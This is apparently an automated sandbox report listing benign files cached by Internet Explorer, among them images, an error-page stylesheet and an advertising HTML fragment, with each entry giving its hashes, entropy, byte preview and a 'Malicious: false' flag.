                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15626
                                                                                                                                                                                                                                  Entropy (8bit):7.962500897509523
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0JDz3LK/RAsFLqnDKf9aQI7LxXXylceAwl:0JDrLK/RAsF+nGf9aQOtXy7fl
                                                                                                                                                                                                                                  MD5:A52E535F3BC8BC8042A2DA850FA5EAF9
                                                                                                                                                                                                                                  SHA1:A921CB4EB83506A6E60D30F4DEB835DCA3EA6DEC
                                                                                                                                                                                                                                  SHA-256:AAE858FFA5F17507E49190460F62FF561C3EE8798A51464456F4B189DE6834BE
                                                                                                                                                                                                                                  SHA-512:06B934D9CF90F57875F4345F35DD7FF2B344F1C1DB531DA8747F271D185EFF6973B97DBAB20F3755B33E6BFE242198071DC179D0855946218FFDE4FF7CA4ED45
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...nA.<z.....VI?{.#.j.4...{.l.....]ID2..!...8.q.c.._p*p.[..P.)...D..v.:pi...m...+..6r.qZBVD.\.K.qj....G@y..+....g.C:.M.,A ...:...b..V.R..r.Y........ ..Q.-..R.K@O....N..3...m..W..S..Y|..P....nv....J..K.3...nn.....ih....r..z...2..`7.......no.y.......W....4G...O..0..,..NI.&....R.3.SD..LB6..#8..J...C....|..l..)8.1[..c-.0....R..C.I.w..>.....C.4y$..l...G.K.c.t..s..bH.RH.....!.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgs0a[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13020
                                                                                                                                                                                                                                  Entropy (8bit):7.879416972104943
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:N3pY6zGTzlrB4GOhxp1FCoQINdi52hZl+uuZj3os:N3pshEDpfChgi5YJGF
                                                                                                                                                                                                                                  MD5:3A0523D4AD4D5B3845A7FD0680E9288B
                                                                                                                                                                                                                                  SHA1:3510C6877C97E5B21141D3AD7DDD46F05E365054
                                                                                                                                                                                                                                  SHA-256:CE5C0C7C063D0C19DC10A6D8ACDFCCAB2623AB8A889147C11757BDA8A04E514F
                                                                                                                                                                                                                                  SHA-512:EE5922D8E1A257FD3504FEC129EA8CCA2CEFDE2798F5B2638045BBB4DF6671DEE93361A9773F59FC29B0DC534BC78762211BFB1758C8B3E8E16ED31FF7A0D4CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....QB......]..m..m...`(L.....A..1@.(....(.q@...\P1@......b....-!.(....(.......qA..........OD..m..P.s.r..@.(3.......4..=.@..@."...0 QA#.@.(.qL..@...\P......b....m...0.P...\P.....(........(......(.........S.d..~f...j.)9.. .....i...)..P.E.V......b....(...(.q@...6.......1H.m0....h.m.....(.@...!...1@...(.........H...].....p..J.......... P1......P!.P..@...$p.....(..P..@..Hb.,..@....b...
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgtUM[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9977
                                                                                                                                                                                                                                  Entropy (8bit):7.946009698326732
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:QoT3vwOvtbiYeKdklm6R3rK0Ht9xS3S4wNvFkBvPopCO/Jv:bToO9dko6rJHDxw+vF6O1
                                                                                                                                                                                                                                  MD5:52FD0C986FE86FA1B95FC4CAF4F18A64
                                                                                                                                                                                                                                  SHA1:BA32E32160A537405CF661194D78BF627AD57295
                                                                                                                                                                                                                                  SHA-256:048CA77D1369A0EC826C5D8F108E052E818A99BD847DAD375DB04D330EA20115
                                                                                                                                                                                                                                  SHA-512:C3AD8FABA1A7292A460582FC2CFA06BDFA0D9949AE43E7CFB5CD7CB93AE422C18230BE86044664D4B0308833761D1C79C9D8EBC77E1E39CADDA3742A676A6085
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..c4R_@..I.h.ji'.....Wi...x.,b...;q.0+...jYH.#{.....MZ.g..A.3,.2%.dg...d..'..z..W*..lN>U.....U.#.;..`F/..|x......H$.pl.J.r.g_...c@.6;.w..1.f.4...#.M.. ..S.:...y.....Z.v$[..4\V...@X...<..$W.H..@...4.."5]U6..w...Y...V...o.k...1........Ih...).T.g.........K.|...@.......<...cU.....y.$...D.!8..I.;.*1.@......P.v .9...V..zP../Y......i.\.;..V..diGE4.....r).Z..m0w6I........l
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgumt[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12102
                                                                                                                                                                                                                                  Entropy (8bit):7.83903065961955
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q259xLWdPUGydsUzuizxcSo5s3N3QStlw12PJd0dymT+QMe3RmFM1iCXJsR2:N7xEPUGgzuizxAs3NAStuwJmsm6Q6F2
                                                                                                                                                                                                                                  MD5:6C482BFC9BCC034E5552DAF300C6433B
                                                                                                                                                                                                                                  SHA1:8D06F42B3A9D940A2D52CDD464EC2E66649802C5
                                                                                                                                                                                                                                  SHA-256:A5A1B76BF9BAE3CA8B2B5D8EDFA17EC093979C33AEC7FBF4E356803C891762D9
                                                                                                                                                                                                                                  SHA-512:6808BD613190107D795D016200C0186650CF51AFC5BE84F8FD05219810B817406EDD6D9CF9F6BA6F6C2D6F6F33069A09B4464CFC1401739E1F5E69B0648FDCE7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?... J."..V...@.m...@..........;...h.6.@..@..(....\P.....@...1@...]..m.a........pZ@<....h.......h......<Rc..1Q....(w.I.h. )...3 ..?J.B......\.V...........@.........b...@.....P....@.........(.......1@....(..P.....0.@...P....M.(ZC.....pZC...&..?1..c-.*.F..C#y.....nI.8...D.#.)...#$~b.#..."X.2e..)Z.....(.(..h...\P.@.../Z.qE..(..@..(....H..C...6..8..xZ.P1......8P;...p.(...q.R..s@..1.b
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgvnc[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13697
                                                                                                                                                                                                                                  Entropy (8bit):7.848115090089445
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q2W3xN4uVWuPUZ3taz4XwR6SrWyBOvf/MWnxdmYpCgco83DCFxPoCOS1YAOHJpwt:NW3xN4u8yUZ3Iz4XwR/mmn2FxP4AO0zX
                                                                                                                                                                                                                                  MD5:F4EFBC68289CAF3A7B9073AF2E9E0BD1
                                                                                                                                                                                                                                  SHA1:46C041D8BBC0AF52E388432795B49D050E7A0A43
                                                                                                                                                                                                                                  SHA-256:4EB34F73471CABFCBC78439D42AF69831807D25F5ACD8151559BED13139D8DE1
                                                                                                                                                                                                                                  SHA-512:BE7E716E94EF3FC30C33D62EE15851E0F7CF635197901C088446AEB3F2B1BF8CC20F7D5B4C2F055A478EB3E622ABE981C0CC3754C0B144E485D5ADC79D0B36A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..t...,(.B..P.P..v.0).]..4..u.<....W.f....P..y9....,.p.x=...j...F..Rk.iLJ2..;..R\I.....d..C...v...p. .|.!.}.qL....@...#.4.;.$z.`..q....... ..3....p98..d#.$P.RJ......1....1.Ua....N....^{.@...F.....P..^..2H.$.... &8....=.+.Uq...v..7$u.p.&..s@.Hga..q.s..B..@...}.h...=h.U.P(...g..T.....b......|....<.=(..K......q.EyQD.B...g.0*.!.<F..@.h.$X.....$.C.n...s.5....4V.^..O.C.......I=.:
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB6Ma4a[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):368
                                                                                                                                                                                                                                  Entropy (8bit):6.811857078347448
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                                                                                                                                                                                                                  MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                                                                                                                                                                                                                  SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                                                                                                                                                                                                                  SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                                                                                                                                                                                                                  SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+....."IDATx.cy. ..?...|.UA....GX...43.!:.o(f..Oa`..C...+Z0.y......~..0...>.....(....X3H.....Y....zQ4.s0....R.u.*t..|....)....(.$.`..a...d.qd.....3...W_...}.*...;.........4.....>....N....)d........p.4......`i.k@QE....j....B....X.7....|..0.....pu?.1B,...J..P.......`F.>R..2.l.(..3J#.L4...9[...N....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BBXXVfm[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):842
                                                                                                                                                                                                                                  Entropy (8bit):7.712790381238881
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                                                                                                                                                                                                                  MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                                                                                                                                                                                                                  SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                                                                                                                                                                                                                  SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                                                                                                                                                                                                                  SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx.e.Oh\U......2.....65...\...].,ZT...Z(...U.....t...P.P..P(.n.Vl.JA......%3...h.i&3y/.z........}.;.|.<.J.6.fcr:LZ-..+...(...Pp.......,y..=..D......V:...Q,....r...5.hI[.a..A.....93.K>.st.........Dq..&....2)..bl.Y.........._..4Ag..s.(l?A..>..m.M.W..O...C....f.......r.^;<...r...n.....9.......t..<.I.r|......|1?S.|......#0..O@.6=}.....q.^..NX.9*.Gh..Q.!i6...A.,..&.5+...o...dod...J......D'CS:....../...:......X|..zH....$#}5K..x^.-.-.X>@.'.W .+.~../..z.o_H.~IF.f.o.}[,.eh,=.....W-....Tf?..........t5$~b...Pgq..6..o}9v..'......KJ.I.|MT.....d..i..7..^.....i2....l..W.X..a.].V...UWf...fd....=.1~K....[.dX...dV..J.......eL....O.....R. .T._.wGr2...W.x. .W......I....4X....Y~.$.c...v\o_^...S......O.z..gV.T..............x...{..7..3i.@%.....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BBZ3zrM[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):763
                                                                                                                                                                                                                                  Entropy (8bit):7.621723844116318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7N5fvaQCJmEzDuMi5ld08fuKGi9o4eUTE5xDgic9NEm652PPanadeh7jteQ8c:IBihmEGMi5ltfDPu4E5iic9NEp52kl9
                                                                                                                                                                                                                                  MD5:CFE739AEAE33DC7C7BB02D24E081F0CE
                                                                                                                                                                                                                                  SHA1:CBE000F23A34635EF4518C919A234DC4A3635C1E
                                                                                                                                                                                                                                  SHA-256:A1F6D07C79B387A99C2550B0E24AD030964EB42ACBA18F21F2D790A05499BAF3
                                                                                                                                                                                                                                  SHA-512:E8CD4F90716E62E4A0A8B9817794F55517CA52EC75F634E55462BBFDFB288076C1992298DB5578C84EC695D3B23BE6FF1AD80EDEEBA8435AAF96B6B32C711C5D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx.]SKO.Q...s;e:.}.}@.._....hb..b..kw........M\..t.0j....|"..E.2..C...S..M...s..;.~W..<.....=>......J.P..?.L........Pf.eB.BU...@.^"1(..05.]UA0....g..N.....H.K.L..P..z....;N..O.pi<...{oVpc*.[..D...@6.a,2....<..sq.h.h~.s.*..I.@L.....h8......)$.4.B.*.....3...m.&..H.....1...8.7...0...u..k.)d..\.;@...:m..*.Tc.....$.v..a..v.x.(;{..G...+...QY..L.N....;E......T..>@r(.;''d...0...../.nT.01...P!...5...P.....`...b.Q....k6.*..l....R.....P.Pw.t;..T.R...6[...\.l.7'Gpq$...[.Z.%....jb..`e..T.X...C.Y#.W..\.....B.B..mR...p.0.?.J..[.....K...Sl....."B.b.A...@.-..w.`E*.-.w..@<(,Ki.^O...zY^.. 7..4E.oyN..e..'.j.4...4ST .?.D.G....(...C..<.....8E...<?......../..X^c..j....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\NewErrorPageTemplate[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1612
                                                                                                                                                                                                                                  Entropy (8bit):4.869554560514657
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                                                                  MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                                                                  SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                                                                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                                                                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\auction[1].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13490
                                                                                                                                                                                                                                  Entropy (8bit):5.8925613461298845
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:YRSpjCOThNudaKmhgLOCE7p3dskCtXWbE:Y7OTn6GgL52bCUQ
                                                                                                                                                                                                                                  MD5:2165BE8BA90A281C7F91B2D924C7DBE6
                                                                                                                                                                                                                                  SHA1:CDB8261D85BEF693AED8871B8877AEBE3A08811B
                                                                                                                                                                                                                                  SHA-256:A7852889DF4235E53E32FA6025EA157E66CD31AAF1FD7A31F5472317FE1F33B6
                                                                                                                                                                                                                                  SHA-512:84EC343E21D5C4C90264585438D1A0BC5519E1333C665A6A294792793BD7732EC6FAF010F614C5CED70C2CC46888CB2522B927BD5B0851E0F5C83C52366161B6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ..<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_741faeae9978ab06a1c176f2f525172d_3cecf594-d271-45ce-8a1b-726f8f467c06-tuct834a6ce_1631265102_1631265102_CIi3jgYQr4c_GKCJk8a_rf3WrwEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA&quot;},&quot;tbsessionid&quot;:&quot;v2_741faeae9978ab06a1c176f2f525172d_3cecf594-d271-45ce-8a1b-726f8f467c06-tuct834a6ce_1631265102_1631265102_CIi3jgYQr4c_GKCJk8a_rf3WrwEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA&quot;,&quot;pageViewId&quot;:&quot;8579855945c54b10b74180716ce798ce&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">..</script>..<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="9" data-viewab
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\down[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):748
                                                                                                                                                                                                                                  Entropy (8bit):7.249606135668305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                                                                  MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                                                                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                                                                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                                                                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\e151e5[1].gif
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                                  Entropy (8bit):3.122191481864228
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                                                  MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                                                  SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                                                  SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                                                  SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\favicon[2].ico
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1078
                                                                                                                                                                                                                                  Entropy (8bit):1.240940859118772
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
                                                                                                                                                                                                                                  MD5:4123CE1E1732F202F60292941FF1487D
                                                                                                                                                                                                                                  SHA1:9F12B11BDE582DAE37CE8C160537D919C561C464
                                                                                                                                                                                                                                  SHA-256:D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
                                                                                                                                                                                                                                  SHA-512:11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ..............(...&... ..........N...(....... ...............................................................................................................................................................................................................................................................................................(... ...@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\http___cdn.taboola.com_libtrc_static_thumbnails_26b7c43e8735f7408c60e41fb7e91ecd[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15272
                                                                                                                                                                                                                                  Entropy (8bit):7.746669724171038
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+hq4/wYNg7d8qq/uRzBpSPnDyOfia52jvHa:EoYyp8qvGaaE7a
                                                                                                                                                                                                                                  MD5:3D15488C4E13B562DF2958C9C5DFBC8A
                                                                                                                                                                                                                                  SHA1:6EB1FFA4BFC5AC5D1EF77333787957DC73879D16
                                                                                                                                                                                                                                  SHA-256:92C55F09D5705690AA849771A368CB4F1B0EAB9ACCFFA8E62FD9A1C28168EB97
                                                                                                                                                                                                                                  SHA-512:A48C0A9CBA3BB5A1A10991D8C446794BA4F5D87FDB628D3DEAADCAE52191616C782B09C10144CCA47EAE70CF78CD0B2C5A5C4A74376080A666E3155648F88CAB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
